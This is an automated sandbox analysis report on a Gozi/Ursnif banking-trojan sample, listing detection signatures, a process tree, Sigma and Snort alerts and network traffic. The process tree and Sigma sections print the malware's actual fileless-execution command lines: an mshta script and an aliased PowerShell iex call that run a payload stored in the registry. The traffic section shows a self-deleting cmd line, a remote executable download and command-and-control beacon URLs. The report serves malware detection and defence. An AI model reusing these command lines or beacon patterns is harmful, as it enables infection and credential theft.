Windows Analysis Report gozi.exe

Overview

General Information

Sample Name: gozi.exe
Analysis ID: 551701
MD5: 8ee79738c37a919fdf38dc5a621556ce
SHA1: ae35e761cd1633fa8b70bda3c2e3649c1694ffd1
SHA256: 51037666d1982db93e3123e88594d409805d3f1d970e9f926dcadb99f77f50f6
Tags: exe, gozi

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Csc.exe Source File Folder
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • gozi.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\gozi.exe" MD5: 8EE79738C37A919FDF38DC5A621556CE)
    • RegAsm.exe (PID: 5696 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • control.exe (PID: 5676 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • rundll32.exe (PID: 4364 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 2928 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4876 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5700 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5664 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8712.tmp" "c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 2960 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 3640 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4084 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 4488 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\3B0F.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 5340 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • RuntimeBroker.exe (PID: 4176 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 3200 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\3B0F.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 6020 cmdline: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security
0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security
(49 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author
8.3.RegAsm.exe.330a4a0.0.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security
8.3.RegAsm.exe.330a4a0.0.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security
8.3.RegAsm.exe.33b8f40.2.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security
8.3.RegAsm.exe.33894a0.1.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started | Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Users\user\Desktop\gozi.exe" , ParentImage: C:\Users\user\Desktop\gozi.exe, ParentProcessId: 6992, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5696

Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ProcessId: 6536

Sigma detected: Mshta Spawning Windows Shell
Source: Process started | Author: Florian Roth | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ProcessId: 6536

Sigma detected: Suspicious Rundll32 Activity
Source: Process started | Author: juju4, Jonhnathan Ribeiro, oscd.community | Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5676, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 4364

Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6536, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline, ProcessId: 6620

Sigma detected: Possible Applocker Bypass
Source: Process started | Author: juju4 | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Users\user\Desktop\gozi.exe" , ParentImage: C:\Users\user\Desktop\gozi.exe, ParentProcessId: 6992, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5696

Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ProcessId: 6536

Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132864949359535906.6536.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://apr.intooltak.com/lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSH | Avira URL Cloud: Label: malware
Source: http://apr.intooltak.com/vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr | Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file
Source: gozi.exe | Virustotal: Detection: 38%
Source: gozi.exe | Metadefender: Detection: 40%
Source: gozi.exe | ReversingLabs: Detection: 65%

Antivirus / Scanner detection for submitted sample
Source: gozi.exe | Avira: detected

Machine Learning detection for sample
Source: gozi.exe | Joe Sandbox ML: detected

Source: 8.0.RegAsm.exe.400000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.gozi.exe.32857b4.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 8.0.RegAsm.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.7.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.gozi.exe.329b084.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.RegAsm.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_010A7479 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,8_2_010A7479
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: gozi.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdbXP source: powershell.exe, 00000016.00000002.586031203.000002033C29E000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdb source: powershell.exe, 00000016.00000002.585762448.000002033C236000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\New folder\bin\Debug\SLN\transport-manager\obj\Debug\transport-manager.pdb source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdbXP source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source: Binary string: EventManager.pdb source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp
Source: Binary string: Local\{6FD9BC09-0238-7997-8413-56BDF8F7EA41}n.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_03F18409 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,8_2_03F18409
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_03F1B9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,8_2_03F1B9D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_03F0E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,8_2_03F0E91D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_03F22ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,8_2_03F22ECF
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 47_2_0303E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,47_2_0303E91D
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 47_2_0304B9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,47_2_0304B9D4
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 47_2_03052ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,47_2_03052ECF

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49751 -> 185.189.12.123:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49751 -> 185.189.12.123:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 185.189.12.123:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 185.189.12.123:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 185.189.12.123:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49820 -> 185.189.12.123:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49820 -> 185.189.12.123:80

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: io.immontyr.com

Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

May check the online IP address of the machine
Source: C:\Windows\System32\nslookup.exe | DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe | DNS query: name: myip.opendns.com

Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: global traffic | HTTP traffic detected: GET /get/3dvhcv/lia.exe HTTP/1.1 | Host: transfer.sh | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: apr.intooltak.com
Source: global traffic | HTTP traffic detected: GET /g37w_2FYO/KW18Y37P4Dg_2F1TMh_2/FK2ujRayUy6lspI6qOC/AgWOSVQoUjByibFH6VxOps/v3Ehdrv875bm_/2Bs0w7UO/8HLDir_2FrS7hQvf7_2F_2F/dRVLAAfuPh/m30EKXD6FtreycZoi/lobTM_2FcJdc/YK8geqpXCxP/dDLbqs1jlQyVsA/bp_2Fxijgc04UGfwb6H7A/hHd5lPMnnVOlY1xb/cpTKFIgzAGJyGab/7_2BPVHreJHJUQdZTy/CjJC9x69g/tFYle1uxB8JrgYxIiF_2/BMgOKImH_2BEsdbiTm7/xqsfHc14yTZglOas0gOCoM/8tPVx3GttAeuK/bZvFimTpFp_2B/LS HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: apr.intooltak.com
